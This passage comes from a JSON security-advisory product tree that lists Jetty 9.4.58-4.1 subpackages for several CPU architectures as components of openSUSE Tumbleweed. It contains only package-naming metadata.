"product_id": "openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.s390x"
},
"product_reference": "jetty-fcgi-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-fcgi-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-fcgi-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-http-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-http-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-http-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-http-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-http-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-http-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-http-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-http-9.4.58-4.1.s390x"
},
"product_reference": "jetty-http-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-http-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-http-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-http-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-http-spi-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-http-spi-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-http-spi-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-http-spi-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-http-spi-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.s390x"
},
"product_reference": "jetty-http-spi-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-http-spi-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-http-spi-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-io-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-io-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-io-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-io-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-io-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-io-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-io-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-io-9.4.58-4.1.s390x"
},
"product_reference": "jetty-io-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-io-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-io-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-io-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jaas-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-jaas-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jaas-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-jaas-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jaas-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.s390x"
},
"product_reference": "jetty-jaas-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jaas-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-jaas-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jaspi-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-jaspi-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jaspi-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-jaspi-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jaspi-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.s390x"
},
"product_reference": "jetty-jaspi-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jaspi-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-jaspi-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jmx-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-jmx-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jmx-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-jmx-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jmx-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.s390x"
},
"product_reference": "jetty-jmx-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jmx-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-jmx-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jndi-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-jndi-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jndi-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-jndi-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jndi-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.s390x"
},
"product_reference": "jetty-jndi-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jndi-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-jndi-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jsp-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-jsp-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jsp-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-jsp-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jsp-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.s390x"
},
"product_reference": "jetty-jsp-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-jsp-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-jsp-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-minimal-javadoc-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-minimal-javadoc-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-minimal-javadoc-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-minimal-javadoc-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-minimal-javadoc-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.s390x"
},
"product_reference": "jetty-minimal-javadoc-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-minimal-javadoc-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-minimal-javadoc-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-openid-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-openid-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-openid-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-openid-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-openid-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.s390x"
},
"product_reference": "jetty-openid-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-openid-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-openid-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-plus-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-plus-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-plus-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-plus-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-plus-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.s390x"
},
"product_reference": "jetty-plus-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-plus-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-plus-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-project-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-project-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-project-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-project-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-project-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-project-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-project-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-project-9.4.58-4.1.s390x"
},
"product_reference": "jetty-project-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-project-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-project-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-project-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-proxy-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-proxy-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-proxy-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-proxy-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-proxy-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.s390x"
},
"product_reference": "jetty-proxy-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-proxy-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-proxy-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-quickstart-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-quickstart-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-quickstart-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-quickstart-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-quickstart-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.s390x"
},
"product_reference": "jetty-quickstart-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-quickstart-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-quickstart-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-rewrite-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-rewrite-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-rewrite-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-rewrite-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-rewrite-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.s390x"
},
"product_reference": "jetty-rewrite-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-rewrite-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-rewrite-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-security-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-security-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-security-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-security-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-security-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-security-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-security-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-security-9.4.58-4.1.s390x"
},
"product_reference": "jetty-security-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-security-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-security-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-security-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-server-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-server-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-server-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-server-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-server-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-server-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-server-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-server-9.4.58-4.1.s390x"
},
"product_reference": "jetty-server-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-server-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-server-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-server-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-servlet-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-servlet-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-servlet-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-servlet-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-servlet-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.s390x"
},
"product_reference": "jetty-servlet-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-servlet-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-servlet-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-servlets-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-servlets-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-servlets-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-servlets-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-servlets-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.s390x"
},
"product_reference": "jetty-servlets-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-servlets-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-servlets-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-start-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-start-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-start-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-start-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-start-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-start-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-start-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-start-9.4.58-4.1.s390x"
},
"product_reference": "jetty-start-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-start-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-start-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-start-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-util-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-util-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-util-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-util-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-util-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-util-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-util-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-util-9.4.58-4.1.s390x"
},
"product_reference": "jetty-util-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-util-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-util-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-util-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-util-ajax-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-util-ajax-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-util-ajax-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-util-ajax-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-util-ajax-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.s390x"
},
"product_reference": "jetty-util-ajax-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
